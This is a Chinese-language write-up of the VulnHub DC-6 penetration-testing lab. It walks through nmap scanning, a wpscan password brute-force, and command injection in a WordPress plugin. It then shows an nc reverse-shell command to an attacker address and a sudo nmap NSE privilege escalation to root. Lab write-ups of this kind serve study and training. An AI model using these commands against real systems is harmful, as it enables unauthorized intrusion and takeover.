Vulnhub是一個滲透測試實戰網站,DC-6是該系列的第六版,只有一個終極flag。拿到則通關,以下內容是自身復現的過程,總結記錄下來,如有不足請多多指教。
下載地址https://download.vulnhub.com/dc/DC-6.zip
開始滲透主機探測:nmap -sP 192.168.1.*
埠探測:nmap -sV -A -p- 192.168.1.42
訪問web服務重定向到http://wordy/ 需要修改host文件,該站點為WordPress,首頁幾個頁面隨便看了下沒啥亮點,WordPress後臺路徑默認是wp-login.php 所以很容易想到
使用wpscan查找網站上的所有用戶:wpscan —url http://wordy/ -e u
根據下載地址處dc-6作者的提示
字典很大,132M的txt文件,我tm直接謝謝你全家
進行爆破:wpscan —url http://wordy/ -e u -P /usr/share/wordlists/rockyou.txt爆破出用戶是mark,密碼是helpdesk01,WordPress後臺登錄。
後臺activity monitor->Tools處存在命令執行(註:由於輸入框限制了長度需要改一下即可)
反彈shell:nc 192.168.1.41 7777 -e /bin/bash
切換交互式shell:python3 -c 'import pty;pty.spawn("/bin/bash")'在家目錄下發現用戶的密碼:graham/GSo7isUM1D4ssh成功連接graham用戶,然後sudo -l查看一下能夠執行root權限的命令。
sudo -u以指定的用戶作為新的身份(不指定則為root權限)。修改該腳本:echo "/bin/bash" > backups.sh 切換用戶jens,並在jens用戶下使用sudo -l發現nmap可以免密root權限執行
利用nmap進行提權,先寫一個nmap腳本然後用--script進行加載,提權成功
echo 'os.execute("/bin/sh")' > getroot.nse
sudo nmap --script getroot.nse
#whoami
#cd /root
#ls
#cat theflag.txt
- END -